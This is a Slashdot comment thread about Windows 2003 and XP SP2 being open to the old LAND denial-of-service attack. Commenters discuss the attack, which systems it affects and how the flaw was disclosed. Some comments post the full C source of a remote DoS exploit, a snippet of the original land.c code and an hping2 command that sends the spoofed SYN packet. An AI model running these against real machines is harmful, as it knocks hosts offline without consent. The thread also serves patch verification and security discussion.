Windows 2003 and XP SP2 Vulnerable To LAND Attack

An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.

Re:Only win ?

[redJag]

There is a big list before the provided source code [hoobie.net].

What is the LAND attack?

[fizbin]

Quoting from http://www.insecure.org/sploits/land.ip.DOS.html [insecure.org]:

i recently discovered a bug which freezes win95 boxes. here's how

it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.

So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.

Re:News?

[InsaneGeek]

The LAND attack requires an open port, so by definition if the system isn't running any services it will have no open ports and not be vulnerable to this attack.

Two things of note:

[AceJohnny]

WTF is a LAND attack? From the source:
"LAND attack:
Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?

I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "

So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?

Want to do your own testing?

[bluelip]

Grab a copy of hping2 and try:

hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

MOD PARENT UP !

[mirko]

BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable

Re:I know its been around, but...Linking to source

[__aaijsn7246]

Security through obsecurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).

---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=siz eof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->t tl=255;
ipheader->protocol=IP_TCP;
ipheader->sad dr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_a ddr.s_addr;

tcpheader->th_sport=sin.sin_port;
tcpheader->th _dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1 C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_of f=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);

bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr. s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_ addr;
pseudoheader.protocol=6;
pseudoheader.leng th=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---

At least Windows NT is supposedly patched.

[Deathlizard]

http://support.microsoft.com/default.aspx?scid=kb; en-us;165005 [microsoft.com]

Explanation of LAND attack

[Tethys_was_taken]

Found inside the source file:

Date: Thu, 20 Nov 1997 19:40:19 -0500
Reply-To: m3lt <meltman@LAGGED.NET>
Subject: new TCP/IP bug in win95

hi,

i recently discovered a bug which freezes win95 boxes. here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
up.

the piece of code included in this message does that, so... have fun!

i haven't tested this bug on other platforms, i don't have the
ressources. please feel free to do so.

m3lt
meltman@lagged.net

Exploit

[Anonymous Coward]

Courtesy of the fine (French) folk at k-otik.org... an exploit [k-otik.com]. Curse this slashcode lameness filter...

#define _BSD_SOURCE #include #include #include #include #include #include #include #include #include #include #include /* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */ //checksum function by r0ach u_short checksum (u_short *addr, int len) { u_short *w = addr; int i = len; int sum = 0; u_short answer; while (i > 0) { sum += *w++; i-=2; } if (i == 1) sum += *(u_char *)w; sum = (sum >> 16) + (sum & 0xffff); sum = sum + (sum >> 16); return (~sum); } int main(int argc, char ** argv) { struct in_addr src, dst; struct sockaddr_in sin; struct _pseudoheader { struct in_addr source_addr; struct in_addr destination_addr; u_char zero; u_char protocol; u_short length; } pseudoheader; struct ip * iph; struct tcphdr * tcph; int mysock; u_char * packet; u_char * pseudopacket; int on = 1; if( argc != 3) { fprintf(stderr, "r57windos.c by __blf\n"); fprintf(stderr, "RusH Security Team\n"); fprintf(stderr, "Usage: %s \n", argv[0]); return EX_USAGE; } if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } inet_aton(argv[1], &src); inet_aton(argv[1], &dst); iph = (struct ip *) packet; iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_tos = 0; iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); iph->ip_off = htons(IP_DF); iph->ip_ttl = 255; iph->ip_p = IPPROTO_TCP; iph->ip_sum = 0; iph->ip_src = src; iph->ip_dst = dst; tcph = (struct tcphdr *)(packet +sizeof(struct ip)); tcph->th_sport = htons(atoi(argv[2])); tcph->th_dport = htons(atoi(argv[2])); tcph->th_seq = ntohl(rand()); tcph->th_ack = rand(); tcph->th_off = 5; tcph->th_flags = TH_SYN; // setting up TCP SYN flag here tcph->th_win = htons(512); tcph->th_sum = 0; tcph->th_urp = 0; pseudoheader.source_addr = src; pseudoheader.destination_addr = dst; pseudoheader.zero = 0; pseudoheader.protocol = IPPROTO_TCP; pseudoheader.length = htons(sizeof(struct tcphdr)); if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) { perror("malloc()\n"); return EX_OSERR; } memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(!mysock) { perror("socket!\n"); return EX_OSERR; } if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt"); shutdown(mysock, 2); return EX_OSERR; } sin.sin_family = PF_INET; sin.sin_addr = dst; sin.sin_port = htons(80); if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("sendto()\n"); shutdown(mysock, 2); return EX_OSERR; } printf("Packet sent. Remote machine should be down.\n"); shutdown(mysock, 2); return EX_OK; }

Re:Can anyone confirm?

[bluelip]

On my XP box w/ SP2 + no firewall:
for up to 30 seconds after the attack , I can move the mouse, but cannot click on anything.

All network activity stops during that time also.

Re:Can anyone confirm?

[bluelip]

The problem might be w/ your code.

A test listed in an above comment of mine worked for my box. DL hping2 and try:

hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

Re:What kind of software dev process do MS use?

[XorNand]

Yeah, that's the Simple File Sharing "feature" of XP Home Edition. Enabled by default, it can be annoying if you're used to doing things the "old way" (user friendly, but expert hostile). Just use this KB article [microsoft.com] to turn it off.

exploit

[imipak]

Courtesy of the fine (French) folk at k-otik.org... an exploit [k-otik.com].

Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?

Re:wow

[runderwo]

Open Source solutions are so much better because they get the fixes out so much faster?

No. OSS solutions are better because they get the fixes out faster to people who are willing to do their own QA. The key here is that the user has a choice whether to wait for their vendor to release a QA'd fix, or to choose to install the fix themselves because they know no regression will affect them as much as the window of vulnerability would. You don't have that choice as you wait for a proprietary vendor to lumber along on its own schedule to get the patch out the door.

Turn off the firewall?

[prisoner-of-enigma]

Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.

OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.

At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...

Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.

Ho hum

[mogrify]

I hit a Windows XP SP1 box with this to no effect. I had to make some changes to even compile it (http://mixter.void.ru/glibc.txt [mixter.void.ru]). But the test box didn't blink.

Re:Can anyone confirm?

[Anonymous Coward]

Sorry, I am the same anonymous coward replying to myself. It does affect at least SP2, as someone mentioned above icons can not be clicked during 30 seconds, similarly ping stops to work during that time period. Afterwards it goes back to normal, so it doesn't crash it but it does affects it somehow.

Re:Want to do your own testing?

[Anonymous Coward]

doesnt look like it worked on my win2k3 server. also tried it on an xp box as well juts gives me

[send_ip]sendto: 10004

which i have no idea if it works or not becuase i never used this before.

Re:Only win ?

[ip_fired]

I found some interesting things while playing around with this.

1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)

2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!

3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.

I got permission to send one of these packets to my friends Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.

4th: Also, I retested the Mac, and again, the malformed packet did nothing.

Re:UNLABELED too.

[Anonymous Coward]

You're a dork.

If you can't think of 100 good reasons why a security professional or curious sysadmin would want a copy of this code, which, I'll note, has been around in this form for almost 8 years (to the point where it won't even COMPILE on a modern system), then you should put your computer back in its box and ring UPS to get it shipped back to the manufacturer, because you are too stupid to own it.

To elaborate, because you're obviously not so quick on the uptake; 'there is nothing inherently wrong with possessing a tool.' To elaborate further, this snippet of code can be used to verify that any vendor-supplied patch does, in fact, do what it says, amongst other things.

Think before spouting your mouth off. Your post espouses all of the bad ideas behind laws such as the DMCA. With people like you doing the thinking, is it little wonder that such laws get passed?